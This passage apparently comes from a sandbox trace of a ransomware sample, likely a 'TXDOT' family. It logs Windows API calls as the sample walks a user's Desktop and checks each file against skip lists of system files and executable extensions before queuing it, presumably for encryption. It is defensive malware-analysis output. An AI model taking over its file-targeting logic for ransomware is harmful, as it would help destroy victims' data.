ZiZd.jpg", psz2=".") returned 1 [0072.734] StrCmpW (psz1="Cb9DBpMZ2 ZiZd.jpg", psz2="..") returned 1 [0072.734] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0072.734] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0072.734] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="Cb9DBpMZ2 ZiZd.jpg", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\Cb9DBpMZ2 ZiZd.jpg") returned="C:\\Users\\FD1HVy\\Desktop\\Cb9DBpMZ2 ZiZd.jpg" [0072.734] PathFindExtensionW (pszPath="Cb9DBpMZ2 ZiZd.jpg") returned=".jpg" [0072.734] StrCmpW (psz1=".jpg", psz2=".txd0t") returned -1 [0072.738] StrCmpIW (psz1="Cb9DBpMZ2 ZiZd.jpg", psz2="bootsect.bak") returned 1 [0072.738] StrCmpIW (psz1="Cb9DBpMZ2 ZiZd.jpg", psz2="iconcache.db") returned -1 [0072.738] StrCmpIW (psz1="Cb9DBpMZ2 ZiZd.jpg", psz2="thumbs.db") returned -1 [0072.738] StrCmpIW (psz1="Cb9DBpMZ2 ZiZd.jpg", psz2=" ransomware ") returned 1 [0072.738] StrCmpIW (psz1="Cb9DBpMZ2 ZiZd.jpg", psz2=" ransom ") returned 1 [0072.738] StrCmpIW (psz1="Cb9DBpMZ2 ZiZd.jpg", psz2="debug.txt") returned -1 [0072.738] StrCmpIW (psz1="Cb9DBpMZ2 ZiZd.jpg", psz2="boot.ini") returned 1 [0072.738] StrCmpIW (psz1="Cb9DBpMZ2 ZiZd.jpg", psz2="desktop.ini") returned -1 [0072.739] StrCmpIW (psz1="Cb9DBpMZ2 ZiZd.jpg", psz2="autorun.inf") returned 1 [0072.739] StrCmpIW (psz1="Cb9DBpMZ2 ZiZd.jpg", psz2="ntuser.dat") returned -1 [0072.739] StrCmpIW (psz1="Cb9DBpMZ2 ZiZd.jpg", psz2="ntldr") returned -1 [0072.739] StrCmpIW (psz1="Cb9DBpMZ2 ZiZd.jpg", psz2="ntdetect.com") returned -1 [0072.739] StrCmpIW (psz1="Cb9DBpMZ2 ZiZd.jpg", psz2="bootfont.bin") returned 1 [0072.739] StrCmpIW (psz1="Cb9DBpMZ2 ZiZd.jpg", psz2="!TXDOT_READ_ME!.txt") returned 1 [0072.739] PathFindExtensionW (pszPath="Cb9DBpMZ2 ZiZd.jpg") returned=".jpg" [0072.739] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".jpg") returned 0x0 [0072.739] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0072.739] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0072.739] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0072.739] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0072.739] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Desktop\\Cb9DBpMZ2 ZiZd.jpg", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\Cb9DBpMZ2 ZiZd.jpg") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\Cb9DBpMZ2 ZiZd.jpg" [0072.739] SetEvent (hEvent=0x3fc) returned 1 [0072.745] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81c9bb00, ftCreationTime.dwHighDateTime=0x1d5e7c6, ftLastAccessTime.dwLowDateTime=0xadea1ed0, ftLastAccessTime.dwHighDateTime=0x1d5eee9, ftLastWriteTime.dwLowDateTime=0xadea1ed0, ftLastWriteTime.dwHighDateTime=0x1d5eee9, nFileSizeHigh=0x0, nFileSizeLow=0xcb5f, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="CyLY.bmp", cAlternateFileName="")) returned 1 [0072.745] StrCmpW (psz1="CyLY.bmp", psz2=".") returned 1 [0072.745] StrCmpW (psz1="CyLY.bmp", psz2="..") returned 1 [0072.745] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0072.745] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0072.745] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="CyLY.bmp", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\CyLY.bmp") returned="C:\\Users\\FD1HVy\\Desktop\\CyLY.bmp" [0072.745] PathFindExtensionW (pszPath="CyLY.bmp") returned=".bmp" [0072.745] StrCmpW (psz1=".bmp", psz2=".txd0t") returned -1 [0072.745] StrCmpIW (psz1="CyLY.bmp", psz2="bootsect.bak") returned 1 [0072.745] StrCmpIW (psz1="CyLY.bmp", psz2="iconcache.db") returned -1 [0072.745] StrCmpIW (psz1="CyLY.bmp", psz2="thumbs.db") returned -1 [0072.746] StrCmpIW (psz1="CyLY.bmp", psz2=" ransomware ") returned 1 [0072.746] StrCmpIW (psz1="CyLY.bmp", psz2=" ransom ") returned 1 [0072.746] StrCmpIW (psz1="CyLY.bmp", psz2="debug.txt") returned -1 [0072.746] StrCmpIW (psz1="CyLY.bmp", psz2="boot.ini") returned 1 [0072.746] StrCmpIW (psz1="CyLY.bmp", psz2="desktop.ini") returned -1 [0072.746] StrCmpIW (psz1="CyLY.bmp", psz2="autorun.inf") returned 1 [0072.746] StrCmpIW (psz1="CyLY.bmp", psz2="ntuser.dat") returned -1 [0072.746] StrCmpIW (psz1="CyLY.bmp", psz2="ntldr") returned -1 [0072.746] StrCmpIW (psz1="CyLY.bmp", psz2="ntdetect.com") returned -1 [0072.746] StrCmpIW (psz1="CyLY.bmp", psz2="bootfont.bin") returned 1 [0072.746] StrCmpIW (psz1="CyLY.bmp", psz2="!TXDOT_READ_ME!.txt") returned 1 [0072.746] PathFindExtensionW (pszPath="CyLY.bmp") returned=".bmp" [0072.746] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".bmp") returned 0x0 [0072.746] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0072.746] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0072.746] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0072.746] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0072.746] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Desktop\\CyLY.bmp", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\CyLY.bmp") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\CyLY.bmp" [0072.746] SetEvent (hEvent=0x3fc) returned 1 [0072.755] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2e49bf0, ftCreationTime.dwHighDateTime=0x1d5e5d9, ftLastAccessTime.dwLowDateTime=0xff29c150, ftLastAccessTime.dwHighDateTime=0x1d5e1e3, ftLastWriteTime.dwLowDateTime=0xff29c150, ftLastWriteTime.dwHighDateTime=0x1d5e1e3, nFileSizeHigh=0x0, nFileSizeLow=0x47e2, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="DE3scvajpXnclcE34.xls", cAlternateFileName="DE3SCV~1.XLS")) returned 1 [0072.755] StrCmpW (psz1="DE3scvajpXnclcE34.xls", psz2=".") returned 1 [0072.756] StrCmpW (psz1="DE3scvajpXnclcE34.xls", psz2="..") returned 1 [0072.756] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0072.756] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0072.756] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="DE3scvajpXnclcE34.xls", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\DE3scvajpXnclcE34.xls") returned="C:\\Users\\FD1HVy\\Desktop\\DE3scvajpXnclcE34.xls" [0072.756] PathFindExtensionW (pszPath="DE3scvajpXnclcE34.xls") returned=".xls" [0072.756] StrCmpW (psz1=".xls", psz2=".txd0t") returned 1 [0072.756] StrCmpIW (psz1="DE3scvajpXnclcE34.xls", psz2="bootsect.bak") returned 1 [0072.756] StrCmpIW (psz1="DE3scvajpXnclcE34.xls", psz2="iconcache.db") returned -1 [0072.756] StrCmpIW (psz1="DE3scvajpXnclcE34.xls", psz2="thumbs.db") returned -1 [0072.756] StrCmpIW (psz1="DE3scvajpXnclcE34.xls", psz2=" ransomware ") returned 1 [0072.756] StrCmpIW (psz1="DE3scvajpXnclcE34.xls", psz2=" ransom ") returned 1 [0072.756] StrCmpIW (psz1="DE3scvajpXnclcE34.xls", psz2="debug.txt") returned -1 [0072.756] StrCmpIW (psz1="DE3scvajpXnclcE34.xls", psz2="boot.ini") returned 1 [0072.756] StrCmpIW (psz1="DE3scvajpXnclcE34.xls", psz2="desktop.ini") returned -1 [0072.756] StrCmpIW (psz1="DE3scvajpXnclcE34.xls", psz2="autorun.inf") returned 1 [0072.756] StrCmpIW (psz1="DE3scvajpXnclcE34.xls", psz2="ntuser.dat") returned -1 [0072.756] StrCmpIW (psz1="DE3scvajpXnclcE34.xls", psz2="ntldr") returned -1 [0072.756] StrCmpIW (psz1="DE3scvajpXnclcE34.xls", psz2="ntdetect.com") returned -1 [0072.756] StrCmpIW (psz1="DE3scvajpXnclcE34.xls", psz2="bootfont.bin") returned 1 [0072.756] StrCmpIW (psz1="DE3scvajpXnclcE34.xls", psz2="!TXDOT_READ_ME!.txt") returned 1 [0072.756] PathFindExtensionW (pszPath="DE3scvajpXnclcE34.xls") returned=".xls" [0072.756] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".xls") returned 0x0 [0072.756] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0072.756] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0072.756] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0072.756] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0072.756] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Desktop\\DE3scvajpXnclcE34.xls", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\DE3scvajpXnclcE34.xls") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\DE3scvajpXnclcE34.xls" [0072.756] SetEvent (hEvent=0x3fc) returned 1 [0072.763] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x440792d0, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x440792d0, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce389e99, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0072.763] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0072.763] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0072.764] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51e2a550, ftCreationTime.dwHighDateTime=0x1d5eca3, ftLastAccessTime.dwLowDateTime=0xc61bbc60, ftLastAccessTime.dwHighDateTime=0x1d5e828, ftLastWriteTime.dwLowDateTime=0xc61bbc60, ftLastWriteTime.dwHighDateTime=0x1d5e828, nFileSizeHigh=0x0, nFileSizeLow=0x14ae, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="GHZr_0qE96Rjj.avi", cAlternateFileName="GHZR_0~1.AVI")) returned 1 [0072.764] StrCmpW (psz1="GHZr_0qE96Rjj.avi", psz2=".") returned 1 [0072.764] StrCmpW (psz1="GHZr_0qE96Rjj.avi", psz2="..") returned 1 [0072.764] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0072.764] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0072.764] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="GHZr_0qE96Rjj.avi", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\GHZr_0qE96Rjj.avi") returned="C:\\Users\\FD1HVy\\Desktop\\GHZr_0qE96Rjj.avi" [0072.764] PathFindExtensionW (pszPath="GHZr_0qE96Rjj.avi") returned=".avi" [0072.764] StrCmpW (psz1=".avi", psz2=".txd0t") returned -1 [0072.764] StrCmpIW (psz1="GHZr_0qE96Rjj.avi", psz2="bootsect.bak") returned 1 [0072.764] StrCmpIW (psz1="GHZr_0qE96Rjj.avi", psz2="iconcache.db") returned -1 [0072.764] StrCmpIW (psz1="GHZr_0qE96Rjj.avi", psz2="thumbs.db") returned -1 [0072.764] StrCmpIW (psz1="GHZr_0qE96Rjj.avi", psz2=" ransomware ") returned 1 [0072.764] StrCmpIW (psz1="GHZr_0qE96Rjj.avi", psz2=" ransom ") returned 1 [0072.764] StrCmpIW (psz1="GHZr_0qE96Rjj.avi", psz2="debug.txt") returned 1 [0072.764] StrCmpIW (psz1="GHZr_0qE96Rjj.avi", psz2="boot.ini") returned 1 [0072.764] StrCmpIW (psz1="GHZr_0qE96Rjj.avi", psz2="desktop.ini") returned 1 [0072.764] StrCmpIW (psz1="GHZr_0qE96Rjj.avi", psz2="autorun.inf") returned 1 [0072.764] StrCmpIW (psz1="GHZr_0qE96Rjj.avi", psz2="ntuser.dat") returned -1 [0072.764] StrCmpIW (psz1="GHZr_0qE96Rjj.avi", psz2="ntldr") returned -1 [0072.764] StrCmpIW (psz1="GHZr_0qE96Rjj.avi", psz2="ntdetect.com") returned -1 [0072.764] StrCmpIW (psz1="GHZr_0qE96Rjj.avi", psz2="bootfont.bin") returned 1 [0072.764] StrCmpIW (psz1="GHZr_0qE96Rjj.avi", psz2="!TXDOT_READ_ME!.txt") returned 1 [0072.764] PathFindExtensionW (pszPath="GHZr_0qE96Rjj.avi") returned=".avi" [0072.764] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".avi") returned 0x0 [0072.764] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0072.764] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0072.764] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0072.764] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0072.764] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Desktop\\GHZr_0qE96Rjj.avi", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\GHZr_0qE96Rjj.avi") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\GHZr_0qE96Rjj.avi" [0072.764] SetEvent (hEvent=0x3fc) returned 1 [0072.770] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d77c440, ftCreationTime.dwHighDateTime=0x1d5ec46, ftLastAccessTime.dwLowDateTime=0x28888e60, ftLastAccessTime.dwHighDateTime=0x1d5e8aa, ftLastWriteTime.dwLowDateTime=0x28888e60, ftLastWriteTime.dwHighDateTime=0x1d5e8aa, nFileSizeHigh=0x0, nFileSizeLow=0xc017, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="jhscRm6vvE.csv", cAlternateFileName="JHSCRM~1.CSV")) returned 1 [0072.771] StrCmpW (psz1="jhscRm6vvE.csv", psz2=".") returned 1 [0072.771] StrCmpW (psz1="jhscRm6vvE.csv", psz2="..") returned 1 [0072.771] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0072.771] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0072.771] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="jhscRm6vvE.csv", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\jhscRm6vvE.csv") returned="C:\\Users\\FD1HVy\\Desktop\\jhscRm6vvE.csv" [0072.771] PathFindExtensionW (pszPath="jhscRm6vvE.csv") returned=".csv" [0072.771] StrCmpW (psz1=".csv", psz2=".txd0t") returned -1 [0072.771] StrCmpIW (psz1="jhscRm6vvE.csv", psz2="bootsect.bak") returned 1 [0072.771] StrCmpIW (psz1="jhscRm6vvE.csv", psz2="iconcache.db") returned 1 [0072.771] StrCmpIW (psz1="jhscRm6vvE.csv", psz2="thumbs.db") returned -1 [0072.771] StrCmpIW (psz1="jhscRm6vvE.csv", psz2=" ransomware ") returned 1 [0072.771] StrCmpIW (psz1="jhscRm6vvE.csv", psz2=" ransom ") returned 1 [0072.771] StrCmpIW (psz1="jhscRm6vvE.csv", psz2="debug.txt") returned 1 [0072.771] StrCmpIW (psz1="jhscRm6vvE.csv", psz2="boot.ini") returned 1 [0072.771] StrCmpIW (psz1="jhscRm6vvE.csv", psz2="desktop.ini") returned 1 [0072.771] StrCmpIW (psz1="jhscRm6vvE.csv", psz2="autorun.inf") returned 1 [0072.771] StrCmpIW (psz1="jhscRm6vvE.csv", psz2="ntuser.dat") returned -1 [0072.771] StrCmpIW (psz1="jhscRm6vvE.csv", psz2="ntldr") returned -1 [0072.771] StrCmpIW (psz1="jhscRm6vvE.csv", psz2="ntdetect.com") returned -1 [0072.771] StrCmpIW (psz1="jhscRm6vvE.csv", psz2="bootfont.bin") returned 1 [0072.771] StrCmpIW (psz1="jhscRm6vvE.csv", psz2="!TXDOT_READ_ME!.txt") returned 1 [0072.771] PathFindExtensionW (pszPath="jhscRm6vvE.csv") returned=".csv" [0072.771] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".csv") returned 0x0 [0072.771] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0072.771] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0072.771] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0072.771] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0072.771] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Desktop\\jhscRm6vvE.csv", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\jhscRm6vvE.csv") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\jhscRm6vvE.csv" [0072.771] SetEvent (hEvent=0x3fc) returned 1 [0072.775] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2255f40, ftCreationTime.dwHighDateTime=0x1d5ed83, ftLastAccessTime.dwLowDateTime=0x5f6fb860, ftLastAccessTime.dwHighDateTime=0x1d5f01e, ftLastWriteTime.dwLowDateTime=0x5f6fb860, ftLastWriteTime.dwHighDateTime=0x1d5f01e, nFileSizeHigh=0x0, nFileSizeLow=0x1707a, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="K7u1HHJ_-wyjZGJCddO.doc", cAlternateFileName="K7U1HH~1.DOC")) returned 1 [0072.775] StrCmpW (psz1="K7u1HHJ_-wyjZGJCddO.doc", psz2=".") returned 1 [0072.775] StrCmpW (psz1="K7u1HHJ_-wyjZGJCddO.doc", psz2="..") returned 1 [0072.779] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0072.779] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0072.779] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="K7u1HHJ_-wyjZGJCddO.doc", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\K7u1HHJ_-wyjZGJCddO.doc") returned="C:\\Users\\FD1HVy\\Desktop\\K7u1HHJ_-wyjZGJCddO.doc" [0072.779] PathFindExtensionW (pszPath="K7u1HHJ_-wyjZGJCddO.doc") returned=".doc" [0072.779] StrCmpW (psz1=".doc", psz2=".txd0t") returned -1 [0072.779] StrCmpIW (psz1="K7u1HHJ_-wyjZGJCddO.doc", psz2="bootsect.bak") returned 1 [0072.779] StrCmpIW (psz1="K7u1HHJ_-wyjZGJCddO.doc", psz2="iconcache.db") returned 1 [0072.779] StrCmpIW (psz1="K7u1HHJ_-wyjZGJCddO.doc", psz2="thumbs.db") returned -1 [0072.779] StrCmpIW (psz1="K7u1HHJ_-wyjZGJCddO.doc", psz2=" ransomware ") returned 1 [0072.779] StrCmpIW (psz1="K7u1HHJ_-wyjZGJCddO.doc", psz2=" ransom ") returned 1 [0072.779] StrCmpIW (psz1="K7u1HHJ_-wyjZGJCddO.doc", psz2="debug.txt") returned 1 [0072.779] StrCmpIW (psz1="K7u1HHJ_-wyjZGJCddO.doc", psz2="boot.ini") returned 1 [0072.779] StrCmpIW (psz1="K7u1HHJ_-wyjZGJCddO.doc", psz2="desktop.ini") returned 1 [0072.779] StrCmpIW (psz1="K7u1HHJ_-wyjZGJCddO.doc", psz2="autorun.inf") returned 1 [0072.779] StrCmpIW (psz1="K7u1HHJ_-wyjZGJCddO.doc", psz2="ntuser.dat") returned -1 [0072.779] StrCmpIW (psz1="K7u1HHJ_-wyjZGJCddO.doc", psz2="ntldr") returned -1 [0072.779] StrCmpIW (psz1="K7u1HHJ_-wyjZGJCddO.doc", psz2="ntdetect.com") returned -1 [0072.779] StrCmpIW (psz1="K7u1HHJ_-wyjZGJCddO.doc", psz2="bootfont.bin") returned 1 [0072.779] StrCmpIW (psz1="K7u1HHJ_-wyjZGJCddO.doc", psz2="!TXDOT_READ_ME!.txt") returned 1 [0072.779] PathFindExtensionW (pszPath="K7u1HHJ_-wyjZGJCddO.doc") returned=".doc" [0072.779] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".doc") returned 0x0 [0072.779] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0072.779] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0072.780] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0072.780] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0072.780] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Desktop\\K7u1HHJ_-wyjZGJCddO.doc", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\K7u1HHJ_-wyjZGJCddO.doc") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\K7u1HHJ_-wyjZGJCddO.doc" [0072.780] SetEvent (hEvent=0x3fc) returned 1 [0072.790] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa575a7d0, ftCreationTime.dwHighDateTime=0x1d5e5aa, ftLastAccessTime.dwLowDateTime=0x34fdb140, ftLastAccessTime.dwHighDateTime=0x1d5ecb3, ftLastWriteTime.dwLowDateTime=0x34fdb140, ftLastWriteTime.dwHighDateTime=0x1d5ecb3, nFileSizeHigh=0x0, nFileSizeLow=0xa31c, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="lDvQFP7B58nzHOr.m4a", cAlternateFileName="LDVQFP~1.M4A")) returned 1 [0072.790] StrCmpW (psz1="lDvQFP7B58nzHOr.m4a", psz2=".") returned 1 [0072.790] StrCmpW (psz1="lDvQFP7B58nzHOr.m4a", psz2="..") returned 1 [0072.790] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0072.790] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0072.790] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="lDvQFP7B58nzHOr.m4a", cchMax=1072 | out: 